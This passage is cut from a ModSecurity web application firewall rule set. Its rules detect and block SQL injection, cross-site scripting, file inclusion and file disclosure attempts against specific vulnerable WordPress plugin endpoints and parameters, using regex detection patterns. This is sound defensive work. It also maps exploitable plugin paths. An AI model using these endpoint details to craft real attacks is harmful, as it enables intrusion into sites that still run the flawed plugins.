Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011045,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011046) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011046,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-cumulus/tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains mode=tags" "chain" SecRule ARGS:tagcloud "(?i:tagcloud\x3D.+(script|alert|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011942,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:gid "(?i:gid\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012009) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/feedlist/handler_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012009,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:i "(?i:i\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress FeedList Plugin i Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012072) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012072,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:v1 "(?i:v1\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Safe Search Plugin v1 Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/accept-signups/accept-signups_submit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:email "(?i:email\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WORDPRESS Plugin Accept Signups email Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/audio/getid3/demos/demo.browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012353,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:showfile "(?i:showfile\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Audio showfile Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012356) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /js/modalbox/tests/functional/_ajax_method_get.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012356,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:param "(?i:param\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Featured Content param Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012407,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-runnow-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012408,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-view_log-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&logfile\=\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012411,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:post_id\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012412) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012412,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id SELECT',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012413,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012414,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012415,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id DELETE',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012416,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012417,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',tag:'web-application-attack'" SecRule ARGS:post_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress SQL Injection Attempt updateAJAX.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012428,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains task=dologin" "chain" SecRule ARGS:option "(?i:option\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012429,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule ARGS:mosmsg "(?i:mosmsg\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012431,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT',tag:'web-application-attack'" SecRule ARGS:topic "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012432,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT',tag:'web-application-attack'" SecRule ARGS:topic "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT',tag:'web-application-attack'" SecRule ARGS:topic "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012434) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012434,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE',tag:'web-application-attack'" SecRule ARGS:topic "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012435,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII',tag:'web-application-attack'" SecRule ARGS:topic "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE SecRule REQUEST_LINE "@contains /wp-content/plugins/forum-server/feed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012436,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',tag:'web-application-attack'" SecRule ARGS:topic "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WP Forum Server wordpress plugin SQL Injection Attempt -- feed.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2012437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/zotpress/zotpress.image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012437,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:citation 